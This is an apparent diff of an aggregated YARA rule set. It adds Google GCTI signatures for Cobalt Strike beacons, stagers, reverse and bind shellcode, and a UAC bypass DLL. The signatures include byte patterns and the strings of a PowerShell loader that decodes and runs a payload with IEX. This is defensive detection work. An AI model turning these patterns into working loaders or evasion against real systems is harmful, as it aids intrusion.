[2] 00 0A 1? 1? 20 [2] 00 00 20 [2] 00 00 7E [2] 00 0A 28 [2] 00 06 2? 1? ?? 7E [2] 00 0A 28 [2] 00 0A [2-40] 1? ?? 0? 7E [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 2? ?? 2? 1? 1? ?? 1? ?? 1? ?? 28 [2] 00 06 } - $iz1 = /_Cor(Exe|Dll)Main/ fullword + $typelibguid0 = "1df47db2-7bb8-47c2-9d85-5f8d3f04a884" ascii nocase wide condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } /* * YARA Rule Set * Repository Name: GCTI * Repository: https://github.com/chronicle/GCTI - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: 1c5fd42b1895098527fde00c2d9757edf6b303bb * Number of Rules: 90 * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance) @@ -127012,3061 +128880,3895 @@ rule FIREEYE_RT_FE_APT_Loader_MSIL_REVOLVER_1 : FILE incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. - END OF TERMS AND CONDITIONS + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright 2022 Google + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + + */ +rule GCTI_Cobaltstrike_Resources_Artifact64_V1_49_V2_X_V3_0_V3_3_Thru_V3_14 +{ + meta: + description = "Cobalt Strike's resources/artifact64{.dll,.exe,big.exe,big.dll,bigsvc.exe,big.x64.dll} and resources/rtifactuac(alt)64.dll signature for versions v1.49, v2.x, v3.0, and v3.3 through v3.14" + author = "gssincla@google.com" + id = "67902782-500e-5a89-8b2a-59ee21bcba3e" + date = "2022-11-18" + modified = "2022-11-19" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact64_v1_49_to_v4_x.yara#L17-L54" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "9ec57d306764517b5956b49d34a3a87d4a6b26a2bb3d0fdb993d055e0cc9920d" + logic_hash = "289950e89fc743ff4a1b7dcb91c561c7d829cfe3ade1c2f1a09f2e9701cce461" + score = 75 + quality = 85 + tags = "" + + strings: + $a = { 8B [2] 48 98 48 [2] 48 [3] 8B [2] 48 98 48 [3] 44 [3] 8B [2] 89 ?? C1 ?? 1F C1 ?? 1E 01 ?? 83 ?? 03 29 ?? 48 98 48 [3] 0F B6 00 44 [2] 88 } + + condition: + $a +} +rule GCTI_Cobaltstrike_Resources_Artifact64_V3_1_V3_2_V3_14_And_V4_0 +{ + meta: + description = "Cobalt Strike's resources/artifact64{svcbig.exe,.dll,big.dll,svc.exe} and resources/artifactuac(big)64.dll signature for versions 3.14 to 4.x and resources/artifact32svc.exe for 3.14 to 4.x" + author = "gssincla@google.com" + id = "c9e9b8e0-16fe-5abc-b1fe-0e3e586f6db6" + date = "2022-11-18" + modified = "2022-11-19" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact64_v1_49_to_v4_x.yara#L56-L84" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "2e7a39bd6ac270f8f548855b97c4cef2c2ce7f54c54dd4d1aa0efabeecf3ba90" + logic_hash = "e5af04baa1d18d5a2a2c005b40bf93fe6a7b2d7116dfcf3c5b3fa36657448eb9" + score = 75 + quality = 85 + tags = "" + + strings: + $decoderFunction = { 31 ?? EB 0F 41 [2] 03 47 [3] 44 [3] 48 [2] 39 ?? 41 [2] 7C EA 4C [6] E9 } + + condition: + $decoderFunction +} +rule GCTI_Cobaltstrike_Resources_Artifact64_V3_14_To_V4_X +{ + meta: + description = "Cobalt Strike's resources/artifact64{.exe,.dll,svc.exe,svcbig.exe,big.exe,big.dll,.x64.dll,big.x64.dll} and resource/artifactuac(alt)64.exe signature for versions v3.14 through v4.x" + author = "gssincla@google.com" + id = "1c7731d3-429b-57aa-9c17-8de7d0841b1e" + date = "2022-11-18" + modified = "2022-11-19" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact64_v1_49_to_v4_x.yara#L86-L128" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "decfcca0018f2cec4a200ea057c804bb357300a67c6393b097d52881527b1c44" + logic_hash = "af8ba6ba62bf1179510b0940e60f893f61b3ba10c81001dd90fe4c3521e56a37" + score = 75 + quality = 85 + tags = "" + + strings: + $fmtBuilder = { + 41 ?? 5C 00 00 00 + C7 [3] 5C 00 00 00 + C7 [3] 65 00 00 00 + C7 [3] 70 00 00 00 + C7 [3] 69 00 00 00 + C7 [3] 70 00 00 00 + C7 [3] 5C 00 00 00 + C7 [3] 2E 00 00 00 + 89 [3] + 48 [6] + E8 + } + $fmtString = "%c%c%c%c%c%c%c%c%cMSSE-%d-server" + + condition: + all of them +} +rule GCTI_Cobaltstrike_Resources_Httpsstager_Bin_V2_5_Through_V4_X +{ + meta: + description = "Cobalt Strike's resources/httpsstager.bin signature for versions 2.5 to 4.x" + author = "gssincla@google.com" + id = "f45aa40a-3936-50f9-a60e-de7181862d19" + date = "2022-11-18" + modified = "2022-11-19" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpsstager_Bin_v2_5_through_v4_x.yara#L17-L95" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "5ebe813a4c899b037ac0ee0962a439833964a7459b7a70f275ac73ea475705b3" + logic_hash = "d2f722809a59faf8ecd85e46eadf58bf23ba5f515ad9c949843f1e6bfeec1fbf" + score = 75 + quality = 85 + tags = "" + + strings: + $apiLocator = { + 31 ?? + AC + C1 ?? 0D + 01 ?? + 38 ?? + 75 ?? + 03 [2] + 3B [2] + 75 ?? + 5? + 8B ?? 24 + 01 ?? + 66 8B [2] + 8B ?? 1C + 01 ?? + 8B ?? 8B + 01 ?? + 89 [3] + 5? + 5? + } + $InternetSetOptionA = { + 6A 04 + 5? + 6A 1F + 5? + 68 75 46 9E 86 + FF + } + + condition: + $apiLocator and $InternetSetOptionA +} +rule GCTI_Cobaltstrike_Resources_Reverse_Bin_V2_5_Through_V4_X +{ + meta: + description = "Cobalt Strike's resources/reverse.bin signature for versions 2.5 to 4.x" + author = "gssincla@google.com" + id = "182dbcd0-1180-5516-abe3-cf2eebbd0e39" + date = "2022-11-18" + modified = "2022-11-19" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Reverse_Bin_v2_5_through_v4_x.yara#L17-L104" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "887f666d6473058e1641c3ce1dd96e47189a59c3b0b85c8b8fccdd41b84000c7" + logic_hash = "c6c4fc477c7654ec07eb6ef4c6d53805a9b4881ba288754e1f50b3e4b134333c" + score = 75 + quality = 85 + tags = "" + + strings: + $apiLocator = { + 31 ?? + AC + C1 ?? 0D + 01 ?? + 38 ?? + 75 ?? + 03 [2] + 3B [2] + 75 ?? + 5? + 8B ?? 24 + 01 ?? + 66 8B [2] + 8B ?? 1C + 01 ?? + 8B ?? 8B + 01 ?? + 89 [3] + 5? + 5? + } + $ws2_32 = { + 5D + 68 33 32 00 00 + 68 77 73 32 5F + } + $connect = { + 6A 10 + 5? + 5? + 68 99 A5 74 61 + } + + condition: + $apiLocator and $ws2_32 and $connect +} +rule GCTI_Cobaltstrike_Resources_Command_Ps1_V2_5_To_V3_7_And_Resources_Compress_Ps1_V3_8_To_V4_X +{ + meta: + description = "Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x" + author = "gssincla@google.com" + id = "c0b81deb-ed20-5f7e-8e15-e6a9e9362594" + date = "2022-11-18" + modified = "2022-11-22" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x.yara#L17-L33" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62" + logic_hash = "31cf47060757b086d325cd205724a7be8931bbbc6ff2f4be67a6179ee99c42ca" + score = 75 + quality = 85 + tags = "" + + strings: + $ps1 = "$s=New-Object \x49O.MemoryStream(,[Convert]::\x46romBase64String(" nocase + $ps2 = "));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();" nocase + + condition: + all of them +} +rule GCTI_Cobaltstrike_Resources_Bypassuactoken_X64_Dll_V3_11_To_V3_14 +{ + meta: + description = "Cobalt Strike's resources/bypassuactoken.x64.dll from v3.11 to v3.14 (64-bit version)" + author = "gssincla@google.com" + id = "c89befcd-a622-5947-9ce3-a6031901a45a" + date = "2022-11-18" + modified = "2022-11-19" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuactoken_x64_Dll_v3_11_to_v3_14.yara#L17-L118" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "853068822bbc6b1305b2a9780cf1034f5d9d7127001351a6917f9dbb42f30d67" + logic_hash = "adfd212f2e470f666ab8a2168e976c11d3032c31dab7cf56963dae5fc0f6c5f9" + score = 75 + quality = 85 + tags = "" + + strings: + $isHighIntegrityProcess = { + 83 ?? 7A + 75 ?? + 8B [3] + 33 ?? + FF 15 [4] + 44 [4] + 8D [2] + 48 8B ?? + 48 8D [3] + 48 8B ?? + 4C 8B ?? + 48 89 [3] + FF 15 [4] + 85 C0 + 74 ?? + 48 8B ?? + FF 15 [4] + 8D [2] + 8A ?? + 40 [2] + 0F B6 D1 + 48 8B 0F + FF 15 [4] + 81 ?? 00 30 00 00 + } + $executeTaskmgr = { + 44 8D ?? 70 + 48 8D [3] + E8 [4] + 83 [3] 00 + 48 8D [5] + 0F 57 ?? + 66 0F 7F [3] + 48 89 [3] + 48 8D [5] + 48 8D [3] + C7 [3] 70 00 00 00 + C7 [3] 40 00 00 00 + 48 89 [3] + FF 15 + } + + condition: + all of them +} +rule GCTI_Cobaltstrike_Resources_Browserpivot_X64_Bin_V1_48_To_V3_14_And_Sleeve_Browserpivot_X64_Dll_V4_0_To_V4_X +{ + meta: + description = "Cobalt Strike's resources/browserpivot.x64.bin from v1.48 to v3.14 and sleeve/browserpivot.x64.dll from v4.0 to at least v4.4" + author = "gssincla@google.com" + id = "a5dfae85-ff9c-5ca5-9ac0-041c6108a6ed" + date = "2022-11-18" + modified = "2022-11-19" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Browserpivot_x64_Bin_v1_48_to_v3_14_and_Sleeve_Browserpivot_x64_Dll_v4_0_to_v4_x.yara#L17-L64" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "0ad32bc4fbf3189e897805cec0acd68326d9c6f714c543bafb9bc40f7ac63f55" + logic_hash = "a59f19b6e258b724ed88b4255717d066319ba5fb0838d6c6ed11355e9d9b1c22" + score = 75 + quality = 85 + tags = "" + + strings: + $socket_recv = { + FF 15 [4] + 83 ?? FF + 74 ?? + 85 ?? + 74 ?? + 03 ?? + 83 ?? 02 + 72 ?? + 8D ?? FF + 80 [2] 0A + 75 ?? + 8D ?? FE + 80 [2] 0D + } + $fmt = "%1024[^ ] %8[^:]://%1016[^/]%7168[^ ] %1024[^ ]" + + condition: + all of them +} +rule GCTI_Cobaltstrike_Resources_Httpstager_Bin_V2_5_Through_V4_X +{ + meta: + description = "Cobalt Strike's resources/httpstager.bin signature for versions 2.5 to 4.x" + author = "gssincla@google.com" + id = "86109485-c26c-5c51-8d04-dd1add9a8c57" + date = "2022-11-18" + modified = "2022-11-19" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpstager_Bin_v2_5_through_v4_x.yara#L17-L93" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "a47569af239af092880751d5e7b68d0d8636d9f678f749056e702c9b063df256" + logic_hash = "3baab08b0118e00432f1869ba5daa4fc6383bfc020119bfbb3047a008c33fe72" + score = 75 + quality = 85 + tags = "" + + strings: + $apiLocator = { + 31 ?? + AC + C1 ?? 0D + 01 ?? + 38 ?? + 75 ?? + 03 [2] + 3B [2] + 75 ?? + 5? + 8B ?? 24 + 01 ?? + 66 8B [2] + 8B ?? 1C + 01 ?? + 8B ?? 8B + 01 ?? + 89 [3] + 5? + 5? + } + $downloaderLoop = { + B? 00 2F 00 00 + 39 ?? + 74 ?? + 31 ?? + ( E9 | EB ) + } + + condition: + $apiLocator and $downloaderLoop +} +rule GCTI_Cobaltstrike_Resources_Artifact32_And_Resources_Dropper_V1_49_To_V3_14 +{ + meta: + description = "Cobalt Strike's resources/artifact32{.exe,.dll,big.exe,big.dll} and resources/dropper.exe signature for versions 1.49 to 3.14" + author = "gssincla@google.com" + id = "243e3761-cbea-561c-97da-f6ba12ebc7ee" + date = "2022-11-18" + modified = "2022-11-19" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara#L17-L32" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "40fc605a8b95bbd79a3bd7d9af73fbeebe3fada577c99e7a111f6168f6a0d37a" + logic_hash = "437706c808bca28384a6e8e24fa3ae120a4ebe4166fa4ca3564c58b881fb23a8" + score = 75 + quality = 85 + tags = "" + + strings: + $payloadDecoder = { 8B [2] 89 ?? 03 [2] 8B [2] 03 [2] 0F B6 18 8B [2] 89 ?? C1 ?? 1F C1 ?? 1E 01 ?? 83 ?? 03 29 ?? 03 [2] 0F B6 00 31 ?? 88 ?? 8B [2] 89 ?? 03 [2] 8B [2] 03 [2] 0F B6 12 } + + condition: + any of them +} +rule GCTI_Cobaltstrike_Resources_Artifact32_V3_1_And_V3_2 +{ + meta: + description = "Cobalt Strike's resources/artifact32{.dll,.exe,svc.exe,big.exe,big.dll,bigsvc.exe} and resources/artifact32uac(alt).dll signature for versions 3.1 and 3.2" + author = "gssincla@google.com" + id = "4fff7f42-9f50-5945-8ec0-2438ac5c7000" + date = "2022-11-18" + modified = "2022-11-19" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara#L34-L60" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "4f14bcd7803a8e22e81e74d6061d0df9e8bac7f96f1213d062a29a8523ae4624" + logic_hash = "7a0d33d0260c762b4aa67e4084d7474338c60aa684fd3e622614745d90350da8" + score = 75 + quality = 85 + tags = "" + + strings: + $decoderFunc = { 89 ?? B? 04 00 00 00 99 F7 FF 8B [2] 8A [2] 30 ?? 8A ?? 4? 88 } + + condition: + all of them +} +rule GCTI_Cobaltstrike_Resources_Artifact32_V3_14_To_V4_X +{ + meta: + description = "Cobalt Strike's resources/artifact32{.dll,.exe,big.exe,big.dll,bigsvc.exe} signature for versions 3.14 to 4.x and resources/artifact32svc.exe for 3.14 to 4.x and resources/artifact32uac.dll for v3.14 and v4.0" + author = "gssincla@google.com" + id = "8a010305-dce5-55f4-b2dd-a736721efe22" + date = "2022-11-18" + modified = "2022-11-19" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara#L62-L89" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "888bae8d89c03c1d529b04f9e4a051140ce3d7b39bc9ea021ad9fc7c9f467719" + logic_hash = "fc5c353c568e33df80fa5bab14d11112ca211e269043b83dba8b7d1a6a008a7b" + score = 75 + quality = 85 + tags = "" + + strings: + $pushFmtStr = { C7 [3] 5C 00 00 00 C7 [3] 65 00 00 00 C7 [3] 70 00 00 00 C7 [3] 69 00 00 00 C7 [3] 70 00 00 00 F7 F1 C7 [3] 5C 00 00 00 C7 [3] 2E 00 00 00 C7 [3] 5C 00 00 00 } + $fmtStr = "%c%c%c%c%c%c%c%c%cMSSE-%d-server" + + condition: + all of them +} +rule GCTI_Cobaltstrike_Resources_Bind64_Bin_V2_5_Through_V4_X +{ + meta: + description = "Cobalt Strike's resources/bind64.bin signature for versions v2.5 to v4.x" + author = "gssincla@google.com" + id = "a01e7bc3-40e9-5f87-8fd6-926972be273b" + date = "2022-11-18" + modified = "2022-11-19" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bind64_Bin_v2_5_through_v4_x.yara#L17-L109" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "5dd136f5674f66363ea6463fd315e06690d6cb10e3cc516f2d378df63382955d" + logic_hash = "ba79abc5cfeaccb94699c0d85c16b2ddf6820bc148c0fd1c9b33c07222e36cb6" + score = 75 + quality = 85 + tags = "" + + strings: + $apiLocator = { + 48 [2] + AC + 41 [2] 0D + 41 [2] + 38 ?? + 75 ?? + 4C [4] + 45 [2] + 75 ?? + 5? + 44 [2] 24 + 49 [2] + 66 [4] + 44 [2] 1C + 49 [2] + 41 [3] + 48 + } + $calls = { + 41 BA C2 DB 37 67 + FF D5 + 48 [2] + 48 [2] + 41 BA B7 E9 38 FF + FF D5 + 4D [2] + 48 [2] + 48 [2] + 41 BA 74 EC 3B E1 + FF D5 + 48 [2] + 48 [2] + 41 BA 75 6E 4D 61 + } + + condition: + $apiLocator and $calls +} +rule GCTI_Cobaltstrike_Resources_Artifact32Svc_Exe_V3_1_V3_2_V3_14_And_V4_X +{ + meta: + description = "Cobalt Strike's resources/artifact32svc(big).exe signature for versions 3.1 and 3.2 (with overlap with v3.14 through v4.x)" + author = "gssincla@google.com" + id = "732169be-e334-5774-b0ac-54b217a8b681" + date = "2022-11-18" + modified = "2022-11-19" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32svc_Exe_v1_49_to_v4_x.yara#L53-L77" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "871390255156ce35221478c7837c52d926dfd581173818620b738b4b029e6fd9" + logic_hash = "b55211fc2dbe100edb19c3f3a000be513144e3556c4bce8a29a3c0b77451ba96" + score = 75 + quality = 85 + tags = "" + + strings: + $decoderFunc = { 89 ?? B? 04 00 00 00 99 F7 FF 8B [2] 8A [2] 30 } + + condition: + $decoderFunc +} +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_44 +{ + meta: + description = "Cobalt Strike's resources/beacon.dll Version 1.44" + author = "gssincla@google.com" + id = "935ee27f-ce1b-5491-b4a3-cb78f199ab1b" + date = "2022-11-18" + modified = "2023-12-04" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L17-L49" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "75102e8041c58768477f5f982500da7e03498643b6ece86194f4b3396215f9c2" + logic_hash = "ebed8b6dc0b929164b1aa25b491b9d2fbb61d380a8b1268df7d424afe90f613d" + score = 75 + quality = 85 + tags = "" + + strings: + $version_sig = { 0F B7 D2 4A 53 8B D9 83 FA 04 77 36 FF 24 } + $decode = { B1 ?? 30 88 [4] 40 3D 28 01 00 00 7C F2 } + + condition: + all of them +} +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_45 +{ + meta: + description = "Cobalt Strike's resources/beacon.dll Version 1.45" + author = "gssincla@google.com" + id = "04d4d0ee-f1ee-5888-8108-ca55243c770a" + date = "2022-11-18" + modified = "2023-12-04" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L51-L84" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "1a92b2024320f581232f2ba1e9a11bef082d5e9723429b3e4febb149458d1bb1" + logic_hash = "b1472907e0fe0cb26219c268f23483681cc076dab96c1b0f2f0ee472ad319b4f" + score = 75 + quality = 85 + tags = "" + + strings: + $version_sig = { 51 0F B7 D2 4A 53 56 83 FA 08 77 6B FF 24 } + $decode = { B1 ?? 30 88 [4] 40 3D 28 01 00 00 7C F2 } + + condition: + all of them +} +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_46 +{ + meta: + description = "Cobalt Strike's resources/beacon.dll Version 1.46" + author = "gssincla@google.com" + id = "79715042-1963-5e48-8b64-7d915da58d84" + date = "2022-11-18" + modified = "2023-12-04" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L86-L115" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "44e34f4024878024d4804246f57a2b819020c88ba7de160415be38cd6b5e2f76" + logic_hash = "1a5c63c8b5527c0442830a73ded8458cf82a9d8ecb9b31e9a02c10b27ed6195e" + score = 75 + quality = 85 + tags = "" + + strings: + $version_sig = { 8B F2 83 F9 0C 0F 87 8E 00 00 00 FF 24 } + $decode = { B1 ?? 30 88 [4] 40 3D A8 01 00 00 7C F2 } - APPENDIX: How to apply the Apache License to your work. + condition: + all of them +} +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_47 +{ + meta: + description = "Cobalt Strike's resources/beacon.dll Version 1.47" + author = "gssincla@google.com" + id = "ac2249a9-210c-581f-8dd1-7619356dca7d" + date = "2022-11-18" + modified = "2023-12-04" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L117-L144" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "8ff6dc80581804391183303bb39fca2a5aba5fe13d81886ab21dbd183d536c8d" + logic_hash = "8c463d3122f3f79ff5d9b88e3d4f5ed14e6c581edfdfafba8a0c596c494ac1b1" + score = 75 + quality = 85 + tags = "" - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "[]" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. + strings: + $version_sig = { 83 F8 12 77 10 FF 24 } + $decode = { B1 ?? 30 88 [4] 40 3D A8 01 00 00 } - Copyright 2022 Google + condition: + all of them +} +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_48 +{ + meta: + description = "Cobalt Strike's resources/beacon.dll Version 1.48" + author = "gssincla@google.com" + id = "dd15099f-ad19-58df-9ed4-ce66d7ee8540" + date = "2022-11-18" + modified = "2023-12-04" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L146-L178" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "dd4e445572cd5e32d7e9cc121e8de337e6f19ff07547e3f2c6b7fce7eafd15e4" + logic_hash = "3f789eaf334c9bb3236d2834f38156aa92b22a5b674450977086378d195dd216" + score = 75 + quality = 85 + tags = "" - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at + strings: + $version_sig = { 48 57 8B F1 8B DA 83 F8 17 77 12 FF 24 } + $decode = { B1 ?? 30 88 [4] 40 3D A8 01 00 00 7C F2 } - http://www.apache.org/licenses/LICENSE-2.0 + condition: + all of them +} +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_49 +{ + meta: + description = "Cobalt Strike's resources/beacon.dll Version 1.49" + author = "gssincla@google.com" + id = "871e28c9-b580-5a32-8529-2290ded1a1b6" + date = "2022-11-18" + modified = "2023-12-04" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L180-L211" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "52b4bd87e21ee0cbaaa0fc007fd3f894c5fc2c4bae5cbc2a37188de3c2c465fe" + logic_hash = "935232d5ddccdc0401b4d911cdc73a48305347b495219c8c893615fe918f32f1" + score = 75 + quality = 85 + tags = "" - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. + strings: + $version_sig = { 48 56 83 F8 1E 0F 87 23 01 00 00 FF 24 } + $decoder = { B1 ?? 90 30 88 [4] 40 3D A8 01 00 00 7C F2 } - */ -rule GCTI_Cobaltstrike_Resources_Artifact32_And_Resources_Dropper_V1_49_To_V3_14 